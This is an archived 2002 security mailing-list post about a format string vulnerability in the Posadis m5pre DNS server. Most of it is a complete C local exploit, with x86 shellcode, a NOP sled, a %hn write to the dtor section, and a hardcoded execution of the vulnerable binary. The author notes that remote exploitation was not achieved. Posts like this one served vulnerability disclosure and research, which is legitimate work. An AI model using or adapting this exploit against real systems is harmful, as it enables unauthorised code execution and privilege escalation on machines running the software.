Vulnerability Development mailing list archives
Re: bufferoverflow posadis m5pre - ( POC number 2 )
From: KF <dotslash () snosoft com>
Date: Wed, 17 Apr 2002 13:58:57 -0400
We have been working on this issue for a while but have yet to exploit it remotely. The posadis binary is not suid root by default if I remember correctly... from my research on the issue I thought that it may be possible to exploit this issue using a feature called "Hint domains" but I have not been able to test this theory. Here is what we came up with for the exploitation of the local binary ... I was holding on to it until I worked out the remote exploitation but there is no point now. =]
-KF

eSDee wrote:

Netric Security Team - http://www.netric.org
by eSDee

Posadis m5pre2
Type: Stackoverflow
Priority: 2
...
/*
 * Posadis m5pre1 DNS local format string exploit.
 *
 * The exploitation research was provided by KF / Snosoft (http://www.snosoft.com)
 * Original hole was found by KKR of (http://dekode.org)
 * Exploit coded up by The Itch / Promisc (http://www.promisc.org)
 *
 * This exploit was developed on the Snosoft vulnerability research machines
 *
 * - The Itch
 * - itchie () promisc org
 *
 * - Technical Difficulties -
 *
 * 1). Posadis messes with the bytes-written-so-far part, therefore an exact
 *     address cannot be written, it will be off around 20 bytes from the
 *     address you specify.
 * 2). STRANGELY, execve("/bin/sh", "sh", 0); will fail! (no error or anything,
 *     i checked with gdb, i get a SIGTRAP as it supposes but the code will not
 *     be executed. A shellcode that does execve("/tmp/p00p", "p00p", 0) did
 *     work. p00p is just a simple bash script.
 */

#include <stdio.h>
#include <stdlib.h>
#include <string.h>   /* memset, memcpy, strlen */
#include <unistd.h>   /* execl */

#define NOP     0x90
#define EGGSIZE 2048

/* execve /tmp/p00p (courtesy of zillion), see /tmp/p00p */
char shellcode[] =
    "\xeb\x21\x5e\x31\xc0\x88\x46\x07\x88\x46\x11\x89\x76\x12\x8d"
    "\x5e\x08\x89\x5e\x16\x89\x46\x1a\xb0\x0b\x89\xf3\x8d\x4e\x12"
    "\x8d\x56\x1a\xcd\x80\xe8\xda\xff\xff\xff\x2f\x62\x69\x6e\x2f"
    "\x73\x68\x38\x2f\x74\x6d\x70\x2f\x70\x30\x30\x70\x32\x33\x34"
    "\x35\x36\x37\x38\x39\x61\x62\x63\x64\x65";

int main(int argc, char *argv[])
{
    char *fmt;
    char egg[EGGSIZE];
    unsigned long smashaddr = 0x08063d14;   /* overwrite (dtor section) */
    char splitaddr0, splitaddr1, splitaddr2, splitaddr3;

    /* split the target address into its four bytes */
    splitaddr0 = (smashaddr & 0xff000000) >> 24;
    splitaddr1 = (smashaddr & 0x00ff0000) >> 16;
    splitaddr2 = (smashaddr & 0x0000ff00) >> 8;
    splitaddr3 = (smashaddr & 0x000000ff);

    if (!(fmt = malloc(256))) {
        printf("malloc()\n");
        exit(-1);
    }

    memset(fmt, 0x00, 256);
    memset(egg, 0x00, EGGSIZE);

    /* NOP sled followed by the shellcode, handed over in the environment */
    memset(egg, NOP, EGGSIZE - strlen(shellcode));
    memcpy(egg + EGGSIZE - strlen(shellcode) - 1, shellcode, strlen(shellcode));

    /* two %hn writes, one per half of the target address */
    sprintf(fmt, "AAA%c%c%c%c%c%c%c%c%%.49095u%%21$hn%%.15116u%%20$hn",
            splitaddr3, splitaddr2, splitaddr1, splitaddr0,
            splitaddr3 + 2, splitaddr2, splitaddr1, splitaddr0);

    egg[EGGSIZE - 1] = '\0';
    memcpy(egg, "EGG=", 4);
    putenv(egg);

    execl("/home/posadis-m5pre1/src/posadis", "posadis", fmt, NULL);

    return 0;
}
Current thread:
- bufferoverflow posadis m5pre2 eSDee (Apr 17)
- Re: bufferoverflow posadis m5pre - ( POC number 2 ) KF (Apr 17)